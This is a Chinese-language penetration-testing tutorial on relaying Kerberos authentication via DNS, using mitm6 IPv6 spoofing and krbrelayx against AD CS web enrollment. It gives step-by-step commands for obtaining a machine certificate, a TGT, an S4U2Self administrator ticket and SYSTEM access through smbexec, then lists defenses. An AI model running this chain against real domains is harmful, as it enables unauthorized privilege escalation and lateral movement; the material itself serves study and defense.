使用 MITM6 通过 DNS 中继 Kerberos 身份验证技术详解<\/h1>

背景与原理<\/h2>

Kerberos 中继攻击的可行性<\/h3>

传统观点认为 Kerberos 协议由于服务主体名称(SPN)绑定机制难以被中继，但 James Forshaw 的研究证明通过控制 SPN 可以实现 Kerberos 中继攻击。关键发现包括：<\/p>

SPN 映射机制<\/strong>：许多服务类(如 DNS)会隐式映射到 HOST 类，而 HOST SPN 默认在所有计算机账户上设置<\/li>
服务保护缺失<\/strong>：HTTP 等服务通常不支持签名保护，允许中继身份验证<\/li>

通道绑定限制<\/strong>：Windows Kerberos AP_REQ 令牌默认支持通道绑定，但可通过注册表禁用<\/li> <\/ol>
DNS 动态更新与 Kerberos 认证<\/h3>
Active Directory 中 DNS 动态更新过程使用 Kerberos 认证：<\/p>

客户端查询 SOA 记录确定权威 DNS 服务器<\/li>
尝试非安全更新被拒绝后，启动 TKEY 协商<\/li>
使用 Kerberos 建立安全上下文(AP_REQ\/AP_REP 交换)<\/li>
使用 TSIG 密钥签名后续更新请求<\/li> <\/ol>
攻击技术实现<\/h2>
所需工具<\/h3>

mitm6<\/strong>：IPv6 DHCP 欺骗工具，可接管客户端 DNS<\/li>
krbrelayx<\/strong>：Kerberos 中继工具，支持中继到 HTTP\/LDAP<\/li> <\/ol>
攻击步骤详解<\/h3>
1. 设置中继目标<\/h4>
python3 krbrelayx.py --target http:\/\/adcs.pentest.com\/certsrv\/ -ip [<\/span>攻击者IP]<\/span> --victim [<\/span>目标主机名]<\/span> --adcs --template Machine <\/span><\/span><\/code><\/pre>参数说明：<\/p> --target<\/code>：AD CS Web 注册接口URL<\/li> -ip<\/code>：绑定DNS服务器的攻击者IP<\/li> --victim<\/code>：目标主机名<\/li> --adcs<\/code>：指定AD CS目标<\/li> --template<\/code>：证书模板(Machine)<\/li> <\/ul> 2. 启动 mitm6 欺骗<\/h4> mitm6 --domain [<\/span>域名]<\/span> --host-allowlist [<\/span>目标主机名]<\/span> --relay [<\/span>AD CS主机名]<\/span> -i [<\/span>网卡]<\/span> -v <\/span><\/span><\/code><\/pre>3. 获取机器账户证书<\/h4> 成功中继后，krbrelayx 将获取目标机器账户的证书(Base64格式)<\/p> 4. 使用证书获取TGT<\/h4> python3 gettgtpkinit.py [<\/span>域名]<\/span>\/[<\/span>机器账户名]<\/span>$ [<\/span>输出缓存文件]<\/span> -pfx-base64 $(<\/span>cat [<\/span>证书文件]<\/span>)<\/span> <\/span><\/span><\/code><\/pre>5. 通过S4U2Self获取高权限票据<\/h4> python3 gets4uticket.py kerberos+ccache:\/\/[<\/span>域名]<\/span>\\<\/span>[<\/span>机器账户名]<\/span>$:[<\/span>TGT缓存文件]<\/span>@[<\/span>DC主机名]<\/span> cifs\/[<\/span>目标主机名]<\/span>@[<\/span>域名]<\/span> [<\/span>管理员账户]<\/span>@[<\/span>域名]<\/span> [<\/span>输出缓存文件]<\/span> -v <\/span><\/span><\/code><\/pre>6. 使用票据获取系统权限<\/h4> export KRB5CCNAME=[<\/span>管理员票据缓存文件]<\/span> <\/span><\/span>python3 smbexec.py -k [<\/span>域名]<\/span>\/[<\/span>管理员账户]<\/span>@[<\/span>目标主机名]<\/span> -no-pass <\/span><\/span><\/code><\/pre>防御措施<\/h2> 启用SMB签名<\/strong>：强制所有SMB通信使用签名<\/li> 限制证书模板权限<\/strong>：严格控制Machine模板的注册权限<\/li> 禁用IPv6<\/strong>：在不必要环境中禁用IPv6协议<\/li> 实施EPA保护<\/strong>：为敏感服务启用扩展保护认证<\/li> 监控异常DNS更新<\/strong>：检测异常的DNS动态更新行为<\/li> <\/ol> 技术要点总结<\/h2> SPN控制<\/strong>：通过DNS服务映射到HOST类SPN实现中继<\/li> 协议弱点<\/strong>：利用HTTP服务缺乏签名保护的特性<\/li> AD CS滥用<\/strong>：通过证书注册获取机器账户凭据<\/li> 权限提升<\/strong>：结合S4U2Self协议获取管理员权限<\/li> 横向移动<\/strong>：最终获取目标系统SYSTEM权限<\/li> <\/ol> 此技术展示了即使在禁用NTLM的环境中，Kerberos协议仍可能被滥用于权限提升和横向移动，强调了全面防御策略的重要性。<\/p>